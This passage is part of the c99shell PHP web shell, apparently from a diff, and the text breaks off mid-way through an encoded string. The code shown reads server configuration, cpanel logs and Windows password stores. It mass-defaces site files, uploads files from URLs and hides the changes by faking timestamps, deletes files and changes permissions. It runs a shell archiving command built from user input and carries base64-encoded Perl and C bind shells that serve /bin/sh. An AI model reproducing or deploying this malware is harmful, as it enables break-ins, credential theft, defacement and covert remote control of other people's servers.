(file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font 
color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else + { + echo "<b>File-System buffer</b><br><br>"; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";} + $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>"; + shuffle($v); + $v = join("&nbsp;&nbsp;&nbsp;",$v); + echo "<b>Self-remove: ".__FILE__." 
<br>Are you sure?</b><center>".$v."</center>"; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( + "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, + "text"=>$text, "text_regexp"=>$text_regxp, + "text_wwo"=>$deface_text_wwo, + "text_cs"=>$deface_text_cs, + "text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {c99fsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";} + } + echo "<form method=\"POST\">"; + if (!$submit) {echo "<big><b>Attention! 
It's a very dangerous feature, you may lost your data.</b></big><br><br>";} + echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp +<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\"> +<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b> +<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea> +<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." 
secs</b><br><br>";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { + c99fsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + echo "<form method=\"POST\"> +<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" 
name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";} + } + else + { + echo "<b>Changing file-mode</b><br>"; + $perms = view_perms(fileperms($d.$f)); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $group_x = ""; + + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'> +<input type=hidden name=act 
value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error> +<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error> +<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br> +<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br> +<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br> +<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br> +<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br> +<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td> +<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br> +<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br> +<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td> +</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>"; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { + if (empty($uploadfilename)) {$destin = $uploadfile[name];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." 
(can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\"> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=\"submit\" name=\"submit\" value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + 
$delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + } + $act = "ls"; +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $data = $deface_html; + if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);} + $data = str_replace("%%%filename%%%",basename($v),$data); + $data = str_replace("%%%filepath%%%",$v,$data); + $fp = @fopen($v,"w"); + fwrite($fp,$data); + fclose($fp); + if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." 
to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { + $cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\","/",$v); + if (is_dir($v)) + { + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while ($o = readdir($h)) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + + $k = $sort[0]; + if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} + if (empty($sort[1])) {$sort[1] = "d";} + if ($sort[1] != "a") + { + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; + } + else + { + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; + } + + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";} + } + + $tab = array(); + $tab[cols] = array($row); + $tab[head] = array(); + $tab[dirs] = array(); + $tab[links] = array(); + $tab[files] = array(); + + foreach ($list as $v) + { + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + + $uo = urlencode($o); + $ud = urlencode($dir); + 
$uv = urlencode($v); + + $row = array(); + + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size(filesize($v)); + } + $row[] = date("d.m.Y H:i:s",filemtime($v)); + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = $ow["name"]."/".$gr["name"]; + } + + if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";} + else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";} + + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" 
width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} + } + } + $v = $sort[0]; + function tabsort($a, $b) + { + global $v; + return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { + $tab[dirs] = array_reverse($tab[dirs]); + $tab[files] = array_reverse($tab[files]); + } + //Compiling table + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." 
directories):</b></center><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>"; + echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>"; + if ($usefsbuff) + { + echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>"; + echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>"; + echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>"; + } + if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";} + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "bind") +{ + $bndsrcs = array( +"c99sh_bindport.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW". +"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI". +"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS". 
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp". +"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph". +"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl". +"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy". +"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K". +"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K". +"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9", + +"c99sh_bindport.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5". +"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N". +"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy". +"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1". +"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f". +"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p". +"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm". +"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi". +"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl". +"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h". +"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN". +"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy". +"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp". +"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN". +"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K". +"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg". +"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g". 
